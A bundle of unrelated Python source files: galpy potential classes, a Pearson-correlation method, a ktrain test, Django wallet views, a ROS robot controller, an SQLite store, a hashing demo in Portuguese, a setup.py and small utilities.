amp - amplitude to be applied to the potential (default: 1); can be a Quantity with units of mass or Gxmass
a - scale radius (can be Quantity)
b - y-to-x axis ratio of the density
c - z-to-x axis ratio of the density
zvec= (None) If set, a unit vector that corresponds to the z axis
pa= (None) If set, the position angle of the x axis
glorder= (50) if set, compute the relevant force and potential integrals with Gaussian quadrature of this order
normalize - if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
ro=, vo= distance and velocity scales for translation into internal units (default from configuration file)
OUTPUT:
(none)
HISTORY:
2010-07-09 - Written - Bovy (UofT)
2018-08-07 - Re-written using the general EllipsoidalPotential class - Bovy (UofT)
"""
EllipsoidalPotential.__init__(self,amp=amp,b=b,c=c,
zvec=zvec,pa=pa,glorder=glorder,
ro=ro,vo=vo,amp_units='mass')
if _APY_LOADED and isinstance(a,units.Quantity):
a= a.to(units.kpc).value/self._ro
self.a= a
self._scale= self.a
# Adjust amp
self.a4= self.a**4
self._amp/= (4.*numpy.pi*self.a**3)
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)):
self.normalize(normalize)
self.hasC= not self._glorder is None
self.hasC_dxdv= False
return None
def _psi(self,m):
"""\psi(m) = -\int_m^\infty d m^2 \rho(m^2)"""
return -self.a4/(m+self.a)**2.
def _mdens(self,m):
"""Density as a function of m"""
return self.a4/m/(m+self.a)**3
def _mdens_deriv(self,m):
"""Derivative of the density as a function of m"""
return -self.a4*(self.a+4.*m)/m**2/(self.a+m)**4
class TriaxialJaffePotential(EllipsoidalPotential):
"""Class that implements the Jaffe potential
.. math::
\\rho(x,y,z) = \\frac{\\mathrm{amp}}{4\\,\\pi\\,a^3}\\,\\frac{1}{(m/a)^2\\,(1+m/a)^{2}}
with
.. math::
m^2 = x'^2 + \\frac{y'^2}{b^2}+\\frac{z'^2}{c^2}
and :math:`(x',y',z')` is a rotated frame wrt :math:`(x,y,z)` specified by parameters ``zvec`` and ``pa`` which specify (a) ``zvec``: the location of the :math:`z'` axis in the :math:`(x,y,z)` frame and (b) ``pa``: the position angle of the :math:`x'` axis wrt the :math:`\\tilde{x}` axis, that is, the :math:`x` axis after rotating to ``zvec``.
"""
def __init__(self,amp=1.,a=2.,b=1.,c=1.,zvec=None,pa=None,normalize=False,
glorder=50,ro=None,vo=None):
"""
NAME:
__init__
PURPOSE:
Initialize a Jaffe potential
INPUT:
amp - amplitude to be applied to the potential (default: 1); can be a Quantity with units of mass or Gxmass
a - scale radius (can be Quantity)
b - y-to-x axis ratio of the density
c - z-to-x axis ratio of the density
zvec= (None) If set, a unit vector that corresponds to the z axis
pa= (None) If set, the position angle of the x axis
glorder= (50) if set, compute the relevant force and potential integrals with Gaussian quadrature of this order
normalize - if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
ro=, vo= distance and velocity scales for translation into internal units (default from configuration file)
OUTPUT:
(none)
HISTORY:
2010-07-09 - Written - Bovy (UofT)
2018-08-07 - Re-written using the general EllipsoidalPotential class - Bovy (UofT)
"""
EllipsoidalPotential.__init__(self,amp=amp,b=b,c=c,
zvec=zvec,pa=pa,glorder=glorder,
ro=ro,vo=vo,amp_units='mass')
if _APY_LOADED and isinstance(a,units.Quantity):
a= a.to(units.kpc).value/self._ro
self.a= a
self._scale= self.a
# Adjust amp
self.a2= self.a**2
self._amp/= (4.*numpy.pi*self.a2*self.a)
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)): #pragma: no cover
self.normalize(normalize)
self.hasC= not self._glorder is None
self.hasC_dxdv= False
return None
def _psi(self,m):
"""\psi(m) = -\int_m^\infty d m^2 \rho(m^2)"""
return 2.*self.a2*(1./(1.+m/self.a)+numpy.log(m/(m+self.a)))
def _mdens(self,m):
"""Density as a function of m"""
return self.a2/m**2/(1.+m/self.a)**2
def _mdens_deriv(self,m):
"""Derivative of the density as a function of m"""
return -2.*self.a2**2*(self.a+2.*m)/m**3/(self.a+m)**3
class TriaxialNFWPotential(EllipsoidalPotential):
"""Class that implements the triaxial NFW potential
.. math::
\\rho(x,y,z) = \\frac{\\mathrm{amp}}{4\\,\\pi\\,a^3}\\,\\frac{1}{(m/a)\\,(1+m/a)^{2}}
with
.. math::
m^2 = x'^2 + \\frac{y'^2}{b^2}+\\frac{z'^2}{c^2}
and :math:`(x',y',z')` is a rotated frame wrt :math:`(x,y,z)` specified by parameters ``zvec`` and ``pa`` which specify (a) ``zvec``: the location of the :math:`z'` axis in the :math:`(x,y,z)` frame and (b) ``pa``: the position angle of the :math:`x'` axis wrt the :math:`\\tilde{x}` axis, that is, the :math:`x` axis after rotating to ``zvec``.
"""
def __init__(self,amp=1.,a=2.,b=1.,c=1.,zvec=None,pa=None,
normalize=False,
conc=None,mvir=None,
glorder=50,vo=None,ro=None,
H=70.,Om=0.3,overdens=200.,wrtcrit=False):
"""
NAME:
__init__
PURPOSE:
Initialize a triaxial NFW potential
INPUT:
amp - amplitude to be applied to the potential (default: 1); can be a Quantity with units of mass or Gxmass
a - scale radius (can be Quantity)
b - y-to-x axis ratio of the density
c - z-to-x axis ratio of the density
zvec= (None) If set, a unit vector that corresponds to the z axis
pa= (None) If set, the position angle of the x axis
glorder= (50) if set, compute the relevant force and potential integrals with Gaussian quadrature of this order
normalize - if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
Alternatively, NFW potentials can be initialized using
conc= concentration
mvir= virial mass in 10^12 Msolar
in which case you also need to supply the following keywords
H= (default: 70) Hubble constant in km/s/Mpc
Om= (default: 0.3) Omega matter
overdens= (200) overdensity which defines the virial radius
wrtcrit= (False) if True, the overdensity is wrt the critical density rather than the mean matter density
ro=, vo= distance and velocity scales for translation into internal units (default from configuration file)
OUTPUT:
(none)
HISTORY:
2016-05-30 - Written - Bovy (UofT)
2018-08-06 - Re-written using the general EllipsoidalPotential class - Bovy (UofT)
"""
EllipsoidalPotential.__init__(self,amp=amp,b=b,c=c,
zvec=zvec,pa=pa,glorder=glorder,
ro=ro,vo=vo,amp_units='mass')
if _APY_LOADED and isinstance(a,units.Quantity):
a= a.to(units.kpc).value/self._ro
if conc is None:
self.a= a
else:
from galpy.potential import NFWPotential
dum= NFWPotential(mvir=mvir,conc=conc,ro=self._ro,vo=self._vo,
H=H,Om=Om,wrtcrit=wrtcrit,overdens=overdens)
self.a= dum.a
self._amp= dum._amp
self._scale= self.a
self.hasC= not self._glorder is None
self.hasC_dxdv= False
# Adjust amp
self.a3= self.a**3
self._amp/= (4.*numpy.pi*self.a3)
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)):
self.normalize(normalize)
return None
def _psi(self,m):
"""\psi(m) = -\int_m^\infty d m^2 \rho(m^2)"""
return -2.*self.a3/(self.a+m)
def _mdens(self,m):
"""Density as a function of m"""
return self.a/m/(1.+m/self.a)**2
def _mdens_deriv(self,m):
"""Derivative of the density as a function of m"""
return -self.a3*(self.a+3.*m)/m**2/(self.a+m)**3
|
py | 1a37d725246250bc16547e700bb736dcaad970fc | # -*- coding: utf-8 -*-
# Copyright (c) St. Anne's University Hospital in Brno. International Clinical
# Research Center, Biomedical Engineering. All Rights Reserved.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# Std imports
# Third pary imports
import numpy as np
# Local imports
from ..utils.method import Method
def compute_lincorr(sig, lag=0, lag_step=0):
"""
Linear correlation (Pearson's coefficient) between two time series
When lag and lag_step is not 0, shifts the sig[1] from negative
to positive lag and takes the max correlation (best fit)
Parameters
----------
sig: np.array
2D numpy array of shape (signals, samples), time series (int, float)
lag: int
negative and positive shift of time series in samples
lag_step: int
step of shift
Returns
-------
lincorr: list
maximum linear correlation in shift
tau: float
shift of maximum correlation in samples,
value in range <-lag,+lag> (float)
tau<0: sig[1] -> sig[0]
tau>0: sig[0] -> sig[1]
Example
-------
lincorr,tau = compute_lincorr(sig, 200, 20)
"""
if type(sig) != np.ndarray:
raise TypeError(f"Signals have to be in numpy arrays!")
if lag == 0:
lag_step = 1
nstep_lag = int(lag * 2 / lag_step)
sig1_w = sig[0]
sig2_w = sig[1]
sig1_wl = sig1_w[lag:len(sig1_w) - lag]
lincorr = []
for i in range(0, nstep_lag + 1):
ind1 = i * lag_step
ind2 = ind1 + len(sig1_wl)
sig2_wl = sig2_w[ind1:ind2]
corr_val = np.corrcoef(sig1_wl, sig2_wl)
lincorr.append(corr_val[0][1])
return np.max(lincorr), lincorr.index(max(lincorr))
class LinearCorrelation(Method):
algorithm = 'LINEAR_CORRELATION'
algorithm_type = 'bivariate'
version = '1.0.0'
dtype = [('max_corr', 'float32'),
('tau', 'float32')]
def __init__(self, **kwargs):
"""
Linear correlation (Pearson's coefficient) between two time series
When win and win_step is not 0, calculates evolution of correlation
When win>len(sig) or win<=0, calculates only one corr coef
When lag and lag_step is not 0, shifts the sig[1] from negative
to positive lag and takes the max correlation (best fit)
Parameters
----------
lag: int
negative and positive shift of time series in samples
lag_step: int
step of shift
"""
super().__init__(compute_lincorr, **kwargs)
|
py | 1a37d819478ad011750e3190bb2ab7de907a805e | #!/usr/bin/env python3
"""
Tests of ktrain text classification flows
"""
import testenv
import numpy as np
from unittest import TestCase, main, skip
import ktrain
from ktrain.imports import ACC_NAME, VAL_ACC_NAME
from ktrain import utils as U
Sequential = ktrain.imports.keras.models.Sequential
Dense = ktrain.imports.keras.layers.Dense
Embedding = ktrain.imports.keras.layers.Embedding
GlobalAveragePooling1D = ktrain.imports.keras.layers.GlobalAveragePooling1D
def synthetic_multilabel():
# data
X = [[1,0,0,0,0,0,0],
[1,2,0,0,0,0,0],
[3,0,0,0,0,0,0],
[3,4,0,0,0,0,0],
[2,0,0,0,0,0,0],
[3,0,0,0,0,0,0],
[4,0,0,0,0,0,0],
[2,3,0,0,0,0,0],
[1,2,3,0,0,0,0],
[1,2,3,4,0,0,0],
[0,0,0,0,0,0,0],
[1,1,2,3,0,0,0],
[2,3,3,4,0,0,0],
[4,4,1,1,2,0,0],
[1,2,3,3,3,3,3],
[2,4,2,4,2,0,0],
[1,3,3,3,0,0,0],
[4,4,0,0,0,0,0],
[3,3,0,0,0,0,0],
[1,1,4,0,0,0,0]]
Y = [[1,0,0,0],
[1,1,0,0],
[0,0,1,0],
[0,0,1,1],
[0,1,0,0],
[0,0,1,0],
[0,0,0,1],
[0,1,1,0],
[1,1,1,0],
[1,1,1,1],
[0,0,0,0],
[1,1,1,0],
[0,1,1,1],
[1,1,0,1],
[1,1,1,0],
[0,1,0,0],
[1,0,1,0],
[0,0,0,1],
[0,0,1,0],
[1,0,0,1]]
X = np.array(X)
Y = np.array(Y)
return (X, Y)
class TestMultilabel(TestCase):
def test_multilabel(self):
X, Y = synthetic_multilabel()
self.assertTrue(U.is_multilabel( (X,Y)))
MAXLEN = 7
MAXFEATURES = 4
NUM_CLASSES = 4
model = Sequential()
model.add(Embedding(MAXFEATURES+1,
50,
input_length=MAXLEN))
model.add(GlobalAveragePooling1D())
model.add(Dense(NUM_CLASSES, activation='sigmoid'))
model.compile(loss='binary_crossentropy',
optimizer='adam',
metrics=['accuracy'])
learner = ktrain.get_learner(model,
train_data=(X, Y),
val_data=(X, Y),
batch_size=1)
learner.lr_find(max_epochs=5) # use max_epochs until TF 2.4
# use loss instead of accuracy due to: https://github.com/tensorflow/tensorflow/issues/41114
hist = learner.fit(0.001, 200)
learner.view_top_losses(n=5)
learner.validate()
#final_acc = hist.history[VAL_ACC_NAME][-1]
#print('final_accuracy:%s' % (final_acc))
#self.assertGreater(final_acc, 0.97)
final_loss = hist.history['val_loss'][-1]
print('final_loss:%s' % (final_loss))
self.assertLess(final_loss, 0.05)
if __name__ == "__main__":
main()
|
py | 1a37d84e30f7c24ea250aecde1ec9c3143480760 | #!/usr/bin/env python3
import pytest
import sys
import fileinput
from os.path import splitext, abspath
F_NAME = splitext(abspath(__file__))[0][:-1]
def answer(lines):
tot = 0
for line in map(str.strip, lines):
print(line)
l, w, h = map(int, line.split('x'))
sides = []
sides.append(l*w)
sides.append(w*h)
sides.append(h*l)
print(sides)
tot += 2*sum(sides) + min(sides) #add smallest side as slack
return tot
@pytest.mark.parametrize( "inp,outp", [
(['2x3x4'], 58),
(['1x1x10'], 43),
])
def test_answer(inp, outp):
assert answer(inp) == outp
if __name__ == '__main__':
print(answer(fileinput.input(F_NAME + '.input')))
|
py | 1a37daaae2173c94118a8b0149b17ac69efe795c | from django.shortcuts import render
from .models import WalletAccount, WalletCredit, WalletDeposit, WalletIncome, WalletExpense, WalletCar, WalletHouse
def wallet_generator_year_month(request, year, month):
year_prev = int(year) - 1 if int(month) == 1 else year
month_prev = int(month) - 1 if int(month) > 1 else 12
filterArgsByYearMonth = {'year': year_prev, 'month': month_prev}
wallet_accounts = WalletAccount.objects.filter(**filterArgsByYearMonth).order_by('-type', 'name')
wallet_deposits = WalletDeposit.objects.filter(**filterArgsByYearMonth).order_by('name')
wallet_credits = WalletCredit.objects.filter(**filterArgsByYearMonth).order_by('name')
filterArgsByYearMonthRegular = {'year': year_prev, 'month': month_prev, 'type': 'regular'}
wallet_incomes = WalletIncome.objects.filter(**filterArgsByYearMonthRegular).order_by('type', 'name')
wallet_expenses = WalletExpense.objects.filter(**filterArgsByYearMonth).order_by('type', 'name')
wallet_houses = WalletHouse.objects.filter(**filterArgsByYearMonth).order_by('name')
wallet_cars = WalletCar.objects.filter(**filterArgsByYearMonth).order_by('exploitation')
log = []
for wallet_account in wallet_accounts:
log.append("New account \"" + str(wallet_account.name) + " " + str(wallet_account.value) + " " + str(wallet_account.currency) + " " + str(wallet_account.type) + "\"")
WalletAccount.objects.create(name=wallet_account.name,
value=wallet_account.value,
currency=wallet_account.currency,
type=wallet_account.type,
year=year,
month=month)
log.append("")
for wallet_deposit in wallet_deposits:
log.append("New deposit \"" + str(wallet_deposit.name) + " " + str(wallet_deposit.value) + " " + str(wallet_deposit.rate) + "\"")
WalletDeposit.objects.create(name=wallet_deposit.name,
value=wallet_deposit.value,
rate=wallet_deposit.rate,
year=year,
month=month)
log.append("")
for wallet_credit in wallet_credits:
log.append("New credit \"" + str(wallet_credit.name) + " " + str(wallet_credit.value) + " " + str(wallet_credit.rate) + " " + str(wallet_credit.balance) + "\"")
WalletCredit.objects.create(name=wallet_credit.name,
value=wallet_credit.value,
rate=wallet_credit.rate,
balance=wallet_credit.balance,
interest=0.0,
insurance=0.0,
capital=0.0,
year=year,
month=month)
log.append("")
for wallet_income in wallet_incomes:
log.append("New income \"" + str(wallet_income.name) + " " + str(wallet_income.type) + "\"")
WalletIncome.objects.create(name=wallet_income.name,
value=0.0,
type=wallet_income.type,
year=year,
month=month)
log.append("")
for wallet_expense in wallet_expenses:
log.append("New expense \"" + str(wallet_expense.name) + "\"")
WalletExpense.objects.create(name=wallet_expense.name,
value=0.0,
type=wallet_expense.type,
year=year,
month=month)
log.append("")
for wallet_house in wallet_houses:
log.append("New house \"" + str(wallet_house.name) + "\"")
WalletHouse.objects.create(name=wallet_house.name,
value=0.0,
year=year,
month=month)
wallet_car = wallet_cars.last()
if wallet_car:
log.append("")
log.append("New car \"" + str(wallet_car.car) + " " + str(wallet_car.exploitation) + "\"")
WalletCar.objects.create(car=wallet_car.car,
exploitation=wallet_car.exploitation,
refuelling=0.0,
payment=0.0,
year=year,
month=month)
return render(request, 'app/wallet_generator.html', {
'year': year,
'month': month,
'log': log
})
def wallet_clear_year_month(request, year, month):
filterArgsByYearMonth = {'year': year, 'month': month}
wallet_accounts = WalletAccount.objects.filter(**filterArgsByYearMonth).order_by('-type', 'name')
wallet_deposits = WalletDeposit.objects.filter(**filterArgsByYearMonth).order_by('name')
wallet_credits = WalletCredit.objects.filter(**filterArgsByYearMonth).order_by('name')
wallet_incomes = WalletIncome.objects.filter(**filterArgsByYearMonth).order_by('type', 'name')
wallet_expenses = WalletExpense.objects.filter(**filterArgsByYearMonth).order_by('type', 'name')
wallet_houses = WalletHouse.objects.filter(**filterArgsByYearMonth).order_by('name')
wallet_cars = WalletCar.objects.filter(**filterArgsByYearMonth).order_by('exploitation')
log = []
for wallet_account in wallet_accounts:
log.append("Clear account \"" + str(wallet_account.name) + " " + str(wallet_account.value) + " " + str(wallet_account.type) + "\"")
WalletAccount.objects.get(id=wallet_account.id).delete()
log.append("")
for wallet_deposit in wallet_deposits:
log.append("Clear deposit \"" + str(wallet_deposit.name) + " " + str(wallet_deposit.value) + " " + str(wallet_deposit.rate) + "\"")
WalletDeposit.objects.get(id=wallet_deposit.id).delete()
log.append("")
for wallet_credit in wallet_credits:
log.append("Clear credit \"" + str(wallet_credit.name) + " " + str(wallet_credit.value) + " " + str(wallet_credit.rate) + " " + str(wallet_credit.balance) + "\"")
WalletCredit.objects.get(id=wallet_credit.id).delete()
log.append("")
for wallet_income in wallet_incomes:
log.append("Clear income \"" + str(wallet_income.name) + " " + str(wallet_income.type) + "\"")
WalletIncome.objects.get(id=wallet_income.id).delete()
log.append("")
for wallet_expense in wallet_expenses:
log.append("Clear expense \"" + str(wallet_expense.name) + "\"")
WalletExpense.objects.get(id=wallet_expense.id).delete()
log.append("")
for wallet_house in wallet_houses:
log.append("Clear house \"" + str(wallet_house.name) + "\"")
WalletHouse.objects.get(id=wallet_house.id).delete()
log.append("")
for wallet_car in wallet_cars:
log.append("Clear car \"" + str(wallet_car.car) + " " + str(wallet_car.exploitation) + "\"")
WalletCar.objects.get(id=wallet_car.id).delete()
return render(request, 'app/wallet_generator.html', {
'year': year,
'month': month,
'log': log
}) |
py | 1a37dc146631bfd3f4cafa02ea714e65c7432d1b | #!/usr/bin/env python
import rospy
import math
from geometry_msgs.msg import Twist
from sensor_msgs.msg import LaserScan
from std_msgs.msg import Float32
from kobuki_msgs.msg import BumperEvent
from kobuki_msgs.msg import CliffEvent
import sys, select, termios, tty
range_center = Float32()
range_left = Float32()
range_right = Float32()
range_left_last = Float32()
range_right_last = Float32()
turnAngle = 17
backUpDistance = 6
speed = 0.5
def callback(data):
#rospy.loginfo("Center: %f", data.ranges[359])
#rospy.loginfo("Left: %f", data.ranges[180])
#rospy.loginfo("Right: %f", data.ranges[540])
range_center.data = data.ranges[359]
range_left.data = data.ranges[180]
range_right.data = data.ranges[540]
def processBump(data):
print ("Bump!")
global bp
global which_bp
if (data.state == BumperEvent.PRESSED):
bp = True
else:
bp = False
rospy.loginfo("Bumper Event")
rospy.loginfo(data.bumper)
which_bp = data.bumper
def processCliff(data):
print ("Cliff!")
global cf
global which_cf
global dis
if (data.state == CliffEvent.CLIFF):
cf = True
else:
cf = False
rospy.loginfo("Cliff Event")
rospy.loginfo(data.sensor)
which_cf = data.sensor
dis = data.bottom
def set_normal_speed():
twist.linear.x = speed
twist.linear.y, twist.linear.z = 0, 0
twist.angular.x, twist.angular.y = 0, 0
twist.angular.z = 0
def turn_left():
twist.linear.x = 0
twist.linear.y, twist.linear.z = 0, 0
twist.angular.x, twist.angular.y = 0, 0
twist.angular.z = 1 * speed
def turn_right():
twist.linear.x = 0
twist.linear.y, twist.linear.z = 0, 0
twist.angular.x, twist.angular.y = 0, 0
twist.angular.z = -1 * speed
def set_backup_speed():
twist.linear.x = -1 * speed
twist.linear.y, twist.linear.z = 0, 0
twist.angular.x, twist.angular.y = 0, 0
twist.angular.z = 0
# mode = {'forward', 'backup', 'turnLeft', 'turnRight'}
def move():
pub = rospy.Publisher('mobile_base/commands/velocity', Twist, queue_size = 20)
sub1 = rospy.Subscriber("scan", LaserScan, callback)
sub2 = rospy.Subscriber('mobile_base/events/bumper', BumperEvent, processBump)
sub3 = rospy.Subscriber('mobile_base/events/cliff', CliffEvent, processCliff)
rospy.init_node('test', anonymous = True)
rate = rospy.Rate(10) # 10HZ
global twist, mode, cf, which_cf, which_bp, dis, bp
cf = False
which_cf = 0
which_bp = 0
twist = Twist()
left, right, bp = False, False, False
mode = 'Forward'
BackupCounter = 0
TurnRightCounter, TurnLeftCounter = 0, 0
ignoreCliff = False
while not rospy.is_shutdown():
if (mode == 'Forward'):
set_normal_speed()
elif (mode == 'Backup'):
ignoreCliff = True
set_backup_speed()
BackupCounter += 1
elif (mode == 'TurnLeft'):
ignoreCliff = False
left = False
turn_left()
TurnLeftCounter += 1
elif (mode == 'TurnRight'):
ignoreCliff = False
right = False
turn_right()
TurnRightCounter += 1
pub.publish(twist)
if (left and BackupCounter > backUpDistance):
BackupCounter = 0
mode = 'TurnLeft'
if (right and BackupCounter > backUpDistance):
BackupCounter = 0
mode = 'TurnRight'
if (TurnRightCounter > turnAngle):
TurnRightCounter = 0
mode = 'Forward'
if (TurnLeftCounter > turnAngle):
TurnLeftCounter = 0
mode = 'Forward'
# if (range_center.data > 1 and not mode == 'Backup' and not mode == 'TurnLeft' and not mode == 'TurnRight'):
# if (range_left.data < 0.2):
# mode = 'Backup'
# if (not right and not left):
# BackupCounter = 0
# right, left = True, False
# elif (range_right.data < 0.2):
# mode = 'Backup'
# if (not right and not left):
# BackupCounter = 0
# right, left = False, True
# elif (range_center.data < 1 and range_center.data > 0.001):
# mode = 'Backup'
# if (not right and not left):
# BackupCounter = 0
# right, left = False, True
if (not ignoreCliff and cf and which_cf == 0):
if (dis < 50000):
which_cf = 0
mode = 'Backup'
print("left cliff")
if (not right and not left):
BackupCounter = 0
right, left = True, False
elif (not ignoreCliff and cf and (which_cf == 2 or which_cf == 1)):
if (dis < 50000):
which_cf = 0
print("right cliff")
mode = 'Backup'
if (not right and not left):
BackupCounter = 0
right, left = False, True
if (bp and which_bp == 0):
which_bp = 0
mode = 'Backup'
print("left bump")
if (not right and not left):
BackupCounter = 0
right, left = True, False
elif (bp and (which_bp == 2 or which_bp == 1)):
which_bp = 0
print("right bump")
mode = 'Backup'
if (not right and not left):
BackupCounter = 0
right, left = False, True
print(mode)
rate.sleep()
if __name__ == '__main__':
try:
move()
except rospy.ROSInterruptException:
pass
|
py | 1a37dd32ce47c45f9d1c087f07656eddbe7ee23a | import numpy as np
import pandas as pd
import os
import sqlalchemy
from time import sleep
import pickle
from numbers import Number
def serialize(x):
if not isinstance(x, (str, Number)):
return pickle.dumps(x)
else:
return x
def unserialize(x):
if not isinstance(x, (str, Number)):
return pickle.loads(x)
else:
return x
class ScanStoreSQL(object):
"""Generic SQLite parameter scan store."""
def __init__(self, scanname, scanid=1, datadir=None):
self.scanname = scanname
self.scanid = scanname
if datadir is None:
datadir = os.getcwd()
self.datadir = datadir
_filename = '{}_{}.sqlite'.format(scanname, scanid)
self.filename = os.path.join(self.datadir, _filename)
@property
def engine(self):
return sqlalchemy.create_engine('sqlite:///' + self.filename)
def store_df(self, key, df, append=True, **kwargs):
"""Store a Pandas DataFrame in a table."""
if_exists = 'append' if append else 'replace'
while True:
try:
df.applymap(serialize).to_sql(key, self.engine, if_exists=if_exists)
break
except sqlalchemy.exc.OperationalError:
sleep(0.001)
def store_row(self, key, array, index=0, columns=None, append=True, **kwargs):
"""Store a numpy array or a list in a table."""
df = pd.DataFrame([array], columns=columns, index=(index,))
self.store_df(key, df, append=append)
def store_dict(self, key, dict, index=0, append=True, **kwargs):
"""Store a dictionary in a table."""
self.store_row(key,
array=list(dict.values()),
index=index,
columns=list(dict.keys()),
**kwargs)
def store_array(self, key, array, index=None, columns=None, append=True, **kwargs):
"""Store a numpy array in a table."""
df = pd.DataFrame(array, columns=columns, index=index, dtype=complex)
self.store_df(key, df, append=append)
def get(self, key):
"""Return a DataFrame for a given key (table name)."""
while True:
try:
with self.engine.connect() as conn, conn.begin():
data = pd.read_sql_table(key, conn)
break
except sqlalchemy.exc.OperationalError:
sleep(0.001)
data = data.set_index('index')
return data.applymap(unserialize)
def drop_table(self, key):
"""Delete (drop) a table"""
pd.io.sql.execute('DROP TABLE {};'.format(key), self.engine)
def read_sql(self, sql):
"""Read SQL query into a data frame."""
return pd.io.sql.read_sql(sql, self.engine)
|
py | 1a37def4d584b26e741f794348872742537486f1 | from lpdm_base_event import LpdmBaseEvent
class LpdmPowerEvent(LpdmBaseEvent):
def __init__(self, source_device_id, target_device_id, time, value):
LpdmBaseEvent.__init__(self, source_device_id, target_device_id, time, value)
self.event_type = "power"
|
py | 1a37dfeda740e5343077231cedb3c573a9cd4e5c | import socket
host = '127.0.0.1'
port = 80
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(b'AAABBBCCC', (host, port))
data, addr = client.recvfrom(4096)
print(data)
|
py | 1a37e09373fb799dd0b382dac9bba3c5d8918a30 | #!/usr/bin/env python3
import operator
from collections import Counter
def read_pt_br_words(filename='/usr/share/dict/brazilian'):
with open(filename) as f:
lines = list(f)
words = [line[:-1] for line in lines]
print(f"Leu {len(words)} palavras em pt-BR")
return words
def make_sbk_table(words):
c = Counter()
for word in words:
c.update(word)
chars = sorted(c.keys())
print(f"Tabela SBK ({len(chars)} caracteres): {''.join(chars)}")
return {ch: i for i, ch in enumerate(chars)}
def _sbk(text, char_to_int=ord):
s = 0
for ch in text:
s += char_to_int(ch)
return {'text': text, 'sum': s, 'sbk': s % 1000}
def _show_sbk(text, char_to_int=ord):
info = _sbk(text, char_to_int)
print(f'Texto: {info["text"]!r}')
print(f'Soma: {info["sum"]}')
print(f'SBK: {info["sbk"]:03d}')
print()
tweet = """Uma função hash bem simples para um trecho de texto é
"Atribua um valor pra cada caractere, some todos, e pegue os últimos 3 dígitos"
Vamos chamar essa função de SBK (Soma do Bruno Kim). Ela produz, pra qualquer texto, um número entre 000 e 999."""
def main():
words = read_pt_br_words()
table = make_sbk_table(words)
def char_to_int(ch):
if ch in table:
return table[ch] + 1
return ord(ch) + len(table) + 1
def sbk(text):
return _sbk(text, char_to_int)
def show_sbk(text):
return _show_sbk(text, char_to_int)
print()
show_sbk(tweet)
show_sbk("patos")
show_sbk("nadam")
show_sbk("debaixo")
show_sbk("d'água")
from collections import Counter
sbk_infos = [sbk(word) for word in words]
sums = Counter(info['sum'] for info in sbk_infos)
hashes = Counter(info['sbk'] for info in sbk_infos)
import csv
with open('sbk-sum-freq.csv', 'w') as f:
w = csv.writer(f)
w.writerow(['sum', 'freq'])
for i in range(max(sums)+1):
w.writerow([i, sums[i]])
with open('sbk-freq.csv', 'w') as f:
w = csv.writer(f)
w.writerow(['hash', 'freq'])
for i in range(1000):
w.writerow([i, hashes[i]])
cum = 0
by_freq = sorted(hashes.items(), reverse=True, key=lambda entry: entry[1])
for i, (h, freq) in enumerate(by_freq):
#print(f"{h:03d}: {freq} (cum={cum:06d})")
cum += freq
if cum > len(words)/2:
print(f"{i} hashes ocupam >50% de todas as palavras")
break
print()
print("SBK:")
print(f" patos: {sbk('patos')['sbk']:03d}")
print(f" patas: {sbk('patas')['sbk']:03d}")
print(f" pat: {sbk('pat')['sbk']:03d}")
print(f" patoso: {sbk('patoso')['sbk']:03d}")
words_201 = [word for word, info
in zip(words, sbk_infos)
if info['sbk'] == 201]
smallest_201 = sorted(words_201, key = lambda s: len(s))[:200]
print(smallest_201)
import hashlib
def sha256(text):
m = hashlib.sha256()
m.update(text.encode("utf-8"))
x = 0
for b in m.digest():
x = 256*x + b
return x
print()
print("SHA-256:")
print(f" patos: {sha256('patos'):076d}")
print(f" patas: {sha256('patas'):076d}")
print(f" pat: {sha256('pat'):076d}")
print(f" patoso: {sha256('patoso'):076d}")
if __name__ == '__main__':
main()
|
py | 1a37e0dc89eaaf1c9baefea9adfa0fdbd8114ebf | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from setuptools import setup
name_ = 'lindh-jsonobject'
github_name = 'jsonobject'
version_ = '1.4.0'
packages_ = [
'lindh.jsonobject',
]
with open("README.rst", "r") as fh:
long_description = fh.read()
classifiers = [
"Programming Language :: Python :: 3",
"Operating System :: OS Independent",
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
]
setup(
name=name_,
version=version_,
author='Johan Egneblad',
author_email='[email protected]',
description='JSON serializable objects',
long_description=long_description,
long_description_content_type="text/x-rst",
license="MIT",
url='https://github.com/eblade/'+github_name,
download_url=('https://github.com/eblade/%s/archive/v%s.tar.gz'
% (github_name, version_)),
packages=packages_,
install_requires=[],
classifiers=classifiers,
)
|
py | 1a37e15cc61d65ac92208dd33fd4df010125cfad | import pandas as pd
def get_density(s, T):
try:
s = s.replace('%20', '+')
except:
pass
density_url = 'http://ddbonline.ddbst.de/DIPPR105DensityCalculation/DIPPR105CalculationCGI.exe?component=' + s
if s == 'Hexane':
rho = float(655)
else:
density = pd.read_html(density_url)[6]
density = density.drop(density.index[0:3]).drop('No.', axis=1)
A = float(density['A'])
B = float(density['B'])
C = float(density['C'])
D = float(density['D'])
Tmin, Tmax = float(density['Tmin']), float(density['Tmax']) # in K
def rho(T):
return A / B ** (1 + (1 - T / C) ** D)
return rho(T) if s != 'Hexane' else rho
|
py | 1a37e175dab1e6379aca817ddcc4c8e396271b20 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
from typing import Optional, Sequence
from hydra.core.utils import JobReturn
from hydra.plugins.launcher import Launcher
from hydra.types import HydraContext, TaskFunction
from omegaconf import DictConfig
from hydra_plugins.hydra_ray_launcher._config import ( # type: ignore
RayAWSConf,
RsyncConf,
)
log = logging.getLogger(__name__)
class RayAWSLauncher(Launcher):
def __init__(
self,
env_setup: DictConfig,
ray: RayAWSConf,
stop_cluster: bool,
sync_up: RsyncConf,
sync_down: RsyncConf,
) -> None:
self.ray_cfg = ray
self.stop_cluster = stop_cluster
self.sync_up = sync_up
self.sync_down = sync_down
self.config: Optional[DictConfig] = None
self.hydra_context: Optional[HydraContext] = None
self.task_function: Optional[TaskFunction] = None
self.ray_yaml_path: Optional[str] = None
self.env_setup = env_setup
